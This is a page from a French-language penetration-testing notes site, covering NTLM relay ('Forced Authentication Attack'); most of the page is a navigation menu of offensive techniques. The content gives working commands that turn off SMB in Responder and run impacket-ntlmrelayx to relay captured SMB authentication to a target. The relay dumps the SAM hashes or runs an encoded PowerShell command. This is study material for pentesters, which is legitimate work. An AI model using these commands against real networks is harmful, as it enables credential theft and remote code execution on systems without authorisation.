Rebrec's Sec Notes

Relais NTLM (Forced Authentication Attack)

rebrec/rebsecnotes-public/

Rebrec's Sec Notes

rebrec/rebsecnotes-public/

Bienvenu sur rebsecnotes
CTF Challenges
CTF Challenges
- Htb
  Htb
Labs
Labs
- DNS server
  DNS server
  - DNS Server
Environnement
Environnement
- Programmation CSharp
  Programmation CSharp
  - Installation d'un environnement de développement CSharp
Méthodologie
Méthodologie
- 0 Reconnaissance
  0 Reconnaissance
  - 1 Passive
    1 Passive
    
    Externe
    Externe
    
    Collecte d'informations Wifi
    
    Employés
    
    Enumeration des domaines
    
    Whois
    
    Collecte de domaines et addresses IP
    Collecte de domaines et addresses IP
    
    Certificats
    
    Infrastructure
    
    Virus Total
  - 2 Active
    2 Active
    
    Enumération de VHOSTS
    
    Enumération des sous domaines
    
    Web
- 1 Enumération
  1 Enumération
  - Bases de données
    Bases de données
    
    MSSQL (SQL Server)
    
    MongoDB
    
    MySQL MariaDB
    
    Oracle TNS
    
    PostgreSQL
    
    Redis
    
    S3
  - Linux
    Linux
    
    Locale
    Locale
    
    Fichiers
  - Services
    Services
    
    DNS
    
    FTP
    
    IMAP et POP3
    
    IPMI
    
    NFS
    
    R Services
    
    RDP
    
    Rsync
    
    SMB
    
    SMTP
    
    SNMP
    
    SSH
    
    WMI
    
    WinRM
  - Web
    Web
    
    Distante
    Distante
    
    Recherche de sauvegardes
    
    Gobuster
  - Windows
    Windows
    
    Distante
    Distante
    
    MS SQL
    
    Recherche de fichiers intéressants depuis Linux
    
    Active Directory
    Active Directory
    
    Active Directory
    
    Locale
    Locale
    
    Premières Vérifications Locales sous Windows
    
    Accès Fichier
    
    Applocker
    
    Connexions TCP
    
    Drivers
    
    Firewall
    
    Infrastructure à clés publiqués (PKI)
    
    Logiciels installés
    
    Partages
    
    Processus
    
    Recherche de fichiers intéressants et credentials depuis Windows
    
    Services en écoute
    
    Services
    
    Système d'exploitation
    
    Taches plannifiées
    
    Vol de hashs
- 2 Obtention d'accès
  2 Obtention d'accès
  - Shells
- 4 Post Exploitation
  4 Post Exploitation
  - Linux
    Linux
    
    Local
    Local
    
    Credential Hunting
  - Windows
    Windows
    
    Local
    Local
    
    Credential Hunting
- Pentest
  Pentest
  - 3 Production de rapports
    3 Production de rapports
    
    Contenu
Techniques
Techniques
- Ajouter un module à Metasploit
- Chiffrer un fichier
- Création d'un exécutable pour lancer une commande
- Enumération d'utilisateurs à distance via la messagerie
- Compilation
  Compilation
  - Compilation d'exploit windows en language C++
- Evasion
  Evasion
  - Modification de User Agent
  - Web Application Firewall bypass
- Linux
  Linux
  - Authentification Kerberos
- Mots de passe
  Mots de passe
  - Bruteforcer un service
  - Choisir une Wordlist
  - Générer une Wordlist
  - Mots de passe par défaut
  - Password Spraying
  - Casser un mot de passe
    Casser un mot de passe
    
    Bitlocker
    
    En Ligne
    
    Hashcat
    
    MD5
    
    Mot de passe Linux
- Pivoting
  Pivoting
- Transferts de fichiers
  Transferts de fichiers
  - Autre outils
    Autre outils
    
    RDP
    
    Nc et ncat
    
    Winrm
  - Linux
    Linux
    
    Listener HTTPS
    
    Listeners HTTP
    
    Transfert de fichiers (download)
  - Via du code
    Via du code
    
    Télécharger avec du code
    
    Uploader avec du code
  - Windows
    Windows
    
    Transfert de fichiers (download)
- Windows
  Windows
  - Icacls
  - AD
    AD
    
    Extra SID Golden Tickets
    
    Pass The Hash (PtH)
    
    Pass the Ticket (PtT)
    
    ACLs
    ACLs
    
    Locale
    Locale
    
    Manuelle (avec module ActiveDirectory)
    
    PowerView
    
    Kerberos
    Kerberos
    
    ASREPRoasting
    
    Kerberoasting
    Kerberoasting
    
    Cassage de mots de passes Kerberos
    
    Kerberoasting
    
    Distant
    Distant
    
    GetUserSPNs.py
    
    Locale
    Locale
    
    Manuel
    
    Powerview
    
    Rubeus
    
    Mauvaises configuration communes
    Mauvaises configuration communes
    
    Elements de configuration à regarder
    
    Exchange
  - Dump de credentials
    Dump de credentials
    
    Dump LSASS et extraction de secrets
    
    Dump de la SAM
    
    NTDS.dit
    
    DCSync
    DCSync
    
    DCSync
    
    Distante
    Distante
    
    Attaque DCSync depuis Linux
    
    Locale
    Locale
    
    Attaque DCSync depuis Windows
  - Privesc
    Privesc
    
    Relais NTLM (Forced Authentication Attack)
    
    Exploitation de vulnérabilités (Quick Wins)
    Exploitation de vulnérabilités (Quick Wins)
    
    Quick Wins
    
    2021
    2021
    
    06
    06
    
    PrintNightmare (CVE 2021 1675)
    
    08
    08
    
    Petit Potam (MS EFSRPC)
    
    11
    11
    
    NoPac (Sam AccountName Spoofing)

Relais NTLM (Forced Authentication Attack)

Il est parfois possible de relayer une demande d'authentification lorsqu'on arrive pas à casser un mot de passe.

# On désactive d'abord SMB dans la configuration du responder 

cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off

# On lance ensuite impacket :
impacket-ntlmrelayx --no-http-server -smb2support -t $TARGET_IP

## Lorsqu'on recoit une connexion SMB, elle est relayée vers $TARGET_IP
## Par défaut un dump de la SAM est réalisé

## On peut également exécuter une commande :
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <B64_PAYLOAD>'